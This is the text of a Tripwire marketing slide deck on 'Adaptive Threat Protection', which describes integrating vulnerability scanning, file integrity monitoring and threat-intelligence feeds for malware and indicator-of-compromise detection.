+ All Categories
Home > Technology > Tripwire Adaptive Threat Protection

Tripwire Adaptive Threat Protection

Date post: 02-Aug-2015
Category:
Upload: tripwire
View: 416 times
Download: 3 times
Share this document with a friend
Popular Tags:
22
Adaptive Threat Protection Dwayne Melancon, CISA CTO and VP of Research & Development
Transcript

Adaptive Threat Protection

Dwayne Melancon, CISACTO and VP of Research & Development

2

Threat Landscape

85%

Percentage of breaches that could be prevented by

remediating known vulnerabilities

US-CERT

205Days

Average time to detect an advanced persistent threat

on a corporate networkMandiant

94%Percentage of unauthorized data access was through compromised servers Verizon DBIR

> 123Days

Days the average malicious data breach took to resolvePonemon

3

The Information Security LandscapeData data everywhere, and not a drop of context

Endpoint Configurations

Vulnerability Results

Threat Intelligence

Logs & Events

BIG D

ATA

4

Enterprise Cyberthreat Gap

Response GapTime between discovery to remediation to limit damage

Detection GapTime between actual breach and discovery

Prevention GapTime to put preventative

measures in place to avoid future attacks

Have we been breached?

Can we prevent this from happening

again?

How bad is it?

DETECTIONGAP

RESPONSEGAP

PREVENTIONGAP

5

Tough Challenge to Close the Cyberthreat Gap

Advanced attacks—harder to detect and faster compromises

Limited resources/time – need better prioritization, what is at risk? what do I fix first?

Limited context from fragmented tools — need high-confidence actionable information

6

Solution: Adaptive Threat Protection

Adaptive Threat

ProtectionEndpoint Intelligence

Vulnerability Intelligence

Threat Intelligence

Threat Analytics

Forensics

Zero-Day Detection

Threat Response

Log & Event Intelligence

Vulnerability Intelligence

8

Good changes

Bad changes

Agent-based “inside-out” visibility

File integrity monitoring

Device and application discovery

Web app vulnerabilities

Agent-less “outside-in”visibility

Vulnerability assessment

Balanced Proactive and Reactive Security Controls

9

Delivering Adaptive Threat Protection

The new integration between Tripwire IP360 and Tripwire Enterprise delivers the unique value of Adaptive Threat Protection:

Continuous analysis of an organization’s attack surface Continuous security control automation Significant reduction of overall cyberthreat risk

10

Manually configure Tripwire Enterprise monitoring based on outdated threat landscape

Detect and respond to threats, harden critical systems at risk, manually or through Tripwire Enterprise automation

Produce a PDF report; manually prioritize vulnerability results; handoff results to others

Scan your environment, find assets and vulnerabilities; limited results

The High Cost of Manual Effort

1Scan

2Report

3Combine

4React

Manuallycorrelate vulnerability

results to assets in Tripwire Enterprise

Other Vulnerability Management Solutions

11

Reduce the Threat Gap with Vulnerability Intelligence

Dynamically adapt Tripwire Enterprise monitoring based on the changing threat landscape

Detect and respond to threats, harden critical systems at risk, manually or through Tripwire Enterprise automation

Use factors such as the Tripwire IP360 score and risk matrix to prioritize vulnerability risk

Use Tripwire IP360 to comprehensively profile the assets for vulnerabilities and applications

1Profile

2Prioritize

3Adapt

4Respond

12

Summary

Accelerated Threat Responseby automatically applying Tripwire Enterprise policies and actions based on vulnerability intelligence.

Faster Threat Detection by automatically delivering prioritized vulnerability intelligence to Tripwire Enterprise.

Effective Threat Prevention

by automatically correlating vulnerability intelligence to business

context

DETECTIONGAP

RESPONSEGAP

PREVENTIONGAP

Threat Intelligence

14

Advanced Threat Detection

Identify all changes to high value systems

Investigate each change, determine if it is suspicious

Kick-off an incident response workflow

15

Advanced Threat Detection

Investigate each change, determine if it is suspicious

Tripwire Enterprise customers are already doing this today

Threat Intelligence adds threat context to dramatically improve the efficiency of this step

16

Malware Identification – Identify known malware on assets with a Tripwire Enteprise agent through integration with threat intelligence partners

Identify Zero-Days and Unknown Threats – Identify zero days and previously unknown threats by ‘detonating’ executable files in partner sandboxes for analysis.

Monitoring for Peer, Community and Commercial IoCs – Automate the forensics investigation and proactive monitoring on high risk assets of indicators of compromise sourced from threat intelligence services

Threat Intelligence Integration Use Cases

17 TRIPWIRE PROPRIETARY & CONFIDENTIAL. NOT FOR DISTRIBUTION

Identify Known Malware

1 Identify files on critical assets 2 Send file hashes to

partner for analysis 3 Update controls based on identified malware

5478192379834875294759273497524933215151

!

Automated Threat Identification Real-Time File Monitoring Support for multiple

Threat Intelligence Vendors

Automates analysis Identifies known and

unknown threats

5478192379834875294759273497524931241542

18 TRIPWIRE PROPRIETARY & CONFIDENTIAL. NOT FOR DISTRIBUTION

Identify Zero Days and Suspicious Files

1 Identify suspicious files on critical assets 2 Send whole file for

‘detonation’ and analysis 3 Update controls based on identified threats

!

Automated Threat Identification Real-Time File Monitoring Support for multiple

Threat Intelligence Vendors

Automates analysis Identifies known and

unknown threats

19 TRIPWIRE PROPRIETARY & CONFIDENTIAL. NOT FOR DISTRIBUTION

Monitor for Indicators of Compromise

1 Obtain IoCs from Threat Intelligence vendor(s) 2 Import IoCs into Tripwire

Enterprise for monitoring 3 Update controls based on identified indicators

IoCs

!

Automated Threat Identification Real-Time File Monitoring Support for multiple

Threat Intelligence Vendors

Automates analysis Identifies known and

unknown threats

20

Open Threat Intelligence IntegrationEnabling zero-day and advanced threat detection and response

DETECTIONGAP

RESPONSEGAP

PREVENTIONGAP

tripwire.com | @TripwireInc

THANK YOU


Recommended